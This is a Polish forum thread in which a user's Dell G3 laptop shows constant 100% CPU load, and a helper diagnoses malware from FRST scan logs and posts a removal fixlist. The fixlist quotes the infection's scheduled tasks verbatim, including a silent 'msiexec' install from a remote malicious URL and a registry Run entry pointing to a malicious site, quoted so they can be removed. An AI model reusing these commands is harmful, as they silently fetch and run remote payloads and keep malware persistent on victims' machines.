logo elektroda
logo elektroda
X
logo elektroda
Szukanie Zaawansowane
logo elektroda
Drukarka UV na Twoim biurku?
Drukarka UV na Twoim biurku? Poznaj eufyMake E1 »
REKLAMA
Dostępna jest polska wersja

Czy wolisz polską wersję strony elektroda?

Nie, dziękuję Przekieruj mnie tam
REKLAMA
REKLAMA
Adblock/uBlockOrigin/AdGuard mogą powodować znikanie niektórych postów z powodu nowej reguły.

[Rozwiązano] Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego

wiktorkk 06 Lis 2018 20:24 903 6
REKLAMA
Zgłoś naruszenie prawa
| Nowy temat
  • #1 17542862
    wiktorkk
    Poziom 2  
    Posty: 3
    Witam, mam problem. Dzisiaj zauważyłem że mój laptop cały czas się chłodzi. Otworzyłem menedżer zadań i okazało się że coś obciąża procesor. Laptop jest nowy. Przeskanowałem McAfee i AVG lecz nie znalazły żadnego wirusa. Jeszcze dodam że zauważyłem z głupoty jak włączyłem przypadkowo Tryb samolotowy(brak połączenia z internetem) to problem zniknął. Bardzo proszę o pomoc, gdyż zapewne to nie jest nic dobrego jak cały czas jest 100% zużycia procesora.
    Załączniki:
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (7).png (208.43 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (6).png (204.41 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (5).png (202.43 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (4).png (210.78 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (3).png (204.76 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (2).png (192.76 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Dell G3 - obciążenie CPU 100% i wpływ Trybu samolotowego Zrzut ekranu (1).png (166.7 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • Pomocny post
    #2 17542866
    Kolobos
    Spec od komputerów
    Posty: 85167
    Pomógł: 17165
    Ocena: 10443
    Zamiesc screen calego okna z Process Explorer (pobierz ze strony MS) zamiast tych bezuzytecznych screenow. Oczywiscie screen zrob z wylaczonym trybem samolotowym, zeby bylo widac co obciaza!

    Zamiesc tez w zalaczniku logi ze skanowania z FRST (Frst.txt oraz Addition.txt):
    http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
  • REKLAMA
  • #3 17542881
    Pedros050
    Poziom 43  
    Posty: 17909
    Pomógł: 2471
    Ocena: 3918
    @wiktorkk Kliknij na ten samolot z prawej strony na pasku na dole i wyłączysz tryb samolotowy.
  • #4 17542918
    wiktorkk
    Poziom 2  
    Posty: 3
    Nie wiem dlaczego ale Process Explorer nie chce mi się uruchomić.
    Załączniki:
    • FRST.txt (205.55 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (38.13 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • REKLAMA
  • Pomocny post
    #6 17542961
    Kolobos
    Spec od komputerów
    Posty: 85167
    Pomógł: 17165
    Ocena: 10443
    Nie wiem po co Ci te wszystkie antywirusy skoro i tak masz zainfekowany system.

    Odinstaluj:
    AVG AntiVirus FREE
    SmartByte Drivers and Services
    McAfee WebAdvisor
    Web Companion

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    Task: {1392CFA9-5067-4763-AA9D-8600F70C0C26} - System32\Tasks\wikto => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v wikto /t REG_SZ /d "explorer.exe hxxp://dipladoks.org" <==== UWAGA
    Task: {4165D84F-91AD-409C-961E-A29F4821872C} - System32\Tasks\{88644BE7-1B8D-9DF2-A808-A33B26EAA008} => C:\Users\wikto\AppData\Local\Programs\Opera\Launcher.exe [2018-10-17] (Opera Software)
    Task: {56AC8DA0-0054-4BB0-94E8-B202ABA19CCB} - System32\Tasks\{5B00ECF6-E553-2334-BC4D-5B902A29720D} => "msiexec.exe" -package hxxps://siamoderg.info/xrxuhwquqhxs.eda /q
    Task: {5F3BA0C0-F67E-4B4B-93CF-9C649640DB93} - System32\Tasks\Opera scheduled Autoupdate 410922362 => C:\Users\wikto\AppData\Roaming\Microsoft\Windows\gbffaewd\tcawtjfe.exe [2018-11-06] ()
    Task: {6E69C788-61ED-4E5F-9E93-B56F8DAF8A79} - System32\Tasks\{5BD86A36-6C09-8103-3EB6-D3F8D05ECD5D} => C:\Users\wikto\AppData\Roaming\apbHwucRfc.exe [2018-04-12] (Microsoft Corporation)
    Task: {D87E7A2E-B6BD-43DA-9EC9-8397D473C0F5} - System32\Tasks\Opera scheduled Autoupdate 1541449227 => C:\Users\wikto\AppData\Local\Programs\Opera\launcher.exe [2018-10-17] (Opera Software)
    HKLM\...\RunOnce: [PC-Doctor for Windows REBOOT] => [X]
    HKU\S-1-5-21-3541333121-2546821857-1266693983-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [7379744 2018-11-05] (Lavasoft)
    HKU\S-1-5-21-3541333121-2546821857-1266693983-1001\...\MountPoints2: D - "D:\setup.exe"
    Startup: C:\Users\wikto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gbffaewd.lnk [2018-11-06]
    HKU\S-1-5-21-3541333121-2546821857-1266693983-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell17win10.msn.com/?pc=DCTE
    SearchScopes: HKU\S-1-5-21-3541333121-2546821857-1266693983-1001 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10454__181105&q={searchTerms}
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
    FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2018-11-05]
    FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSKHKLM => nie znaleziono
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
    FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
    FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2018-11-06] [Przestarzałe] [Brak podpisu cyfrowego]
    FF Plugin: @McAfee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2018-10-04] ()
    FF Plugin-x32: @McAfee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2018-10-04] ()
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    2018-11-06 20:10 - 2018-11-06 20:10 - 000000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2018-11-06 19:48 - 2018-11-06 19:57 - 000088064 _____ C:\Users\wikto\Desktop\Extras.Txt
    2018-11-06 19:48 - 2018-11-06 19:48 - 000541152 _____ C:\Users\wikto\Desktop\OTL.Txt
    2018-11-06 19:26 - 2018-11-06 19:26 - 000602112 _____ (OldTimer Tools) C:\Users\wikto\Desktop\OTL.exe
    2018-11-06 19:16 - 2018-11-06 20:10 - 000002598 _____ C:\WINDOWS\System32\Tasks\wikto
    2018-11-06 18:35 - 2018-11-06 20:10 - 000002834 _____ C:\WINDOWS\System32\Tasks\{88644BE7-1B8D-9DF2-A808-A33B26EAA008}
    2018-11-06 18:35 - 2018-11-06 20:10 - 000002754 _____ C:\WINDOWS\System32\Tasks\{5B00ECF6-E553-2334-BC4D-5B902A29720D}
    2018-11-06 18:35 - 2018-11-06 20:10 - 000002710 _____ C:\WINDOWS\System32\Tasks\{5BD86A36-6C09-8103-3EB6-D3F8D05ECD5D}
    2018-11-06 18:35 - 2018-11-06 18:35 - 000000002 _____ C:\Users\wikto\AppData\Local\imw.ini
    2018-11-06 18:17 - 2018-11-06 20:10 - 000002498 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 410922362
    2018-11-05 21:24 - 2018-11-05 21:24 - 000000000 ____D C:\Users\wikto\AppData\Roaming\Lavasoft
    2018-11-05 21:24 - 2018-11-05 21:24 - 000000000 ____D C:\Users\wikto\AppData\Local\Lavasoft
    2018-11-05 21:24 - 2018-11-05 21:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
    2018-11-05 21:24 - 2018-11-05 21:24 - 000000000 ____D C:\ProgramData\Lavasoft
    2018-11-05 21:24 - 2018-11-05 21:24 - 000000000 ____D C:\Program Files (x86)\Lavasoft
    2018-11-05 21:20 - 2018-11-06 20:10 - 000003556 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1541449227
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Users\wikto\AppData\Roaming\apbHwucRfc.exe
    2018-11-01 22:23 - 2018-11-01 22:23 - 000202636 _____ () C:\Users\wikto\AppData\Roaming\prwlstop.exe
    2018-11-01 22:23 - 2018-11-01 22:23 - 000000060 _____ () C:\Users\wikto\AppData\Roaming\un.txt
    2018-04-12 00:34 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Users\wikto\AppData\Roaming\ZhADCHpE.exe
    2018-11-06 18:35 - 2018-11-06 18:35 - 000000002 _____ () C:\Users\wikto\AppData\Local\imw.ini
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Users\wikto\AppData\Local\OAheVU.exe

    W FRST wybierz Napraw.

    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe
  • #7 17543015
    wiktorkk
    Poziom 2  
    Posty: 3
    Dziękuję za pomoc, pozdrawiam.
| Nowy temat
Zgłoś naruszenie prawa

Podsumowanie tematu

✨ Użytkownik zgłosił problem z laptopem Dell G3, który wykazuje 100% obciążenie CPU, co powoduje nadmierne chłodzenie. Po skanowaniu systemu za pomocą programów McAfee i AVG, nie znaleziono wirusów. Zauważono, że włączenie Trybu samolotowego powoduje zniknięcie problemu. Użytkownicy sugerują użycie narzędzia Process Explorer do identyfikacji procesów obciążających CPU oraz odinstalowanie potencjalnie szkodliwego oprogramowania, takiego jak AVG i McAfee. Dodatkowo, zaleca się utworzenie pliku Fixlist.txt w celu usunięcia złośliwych zadań systemowych.
REKLAMA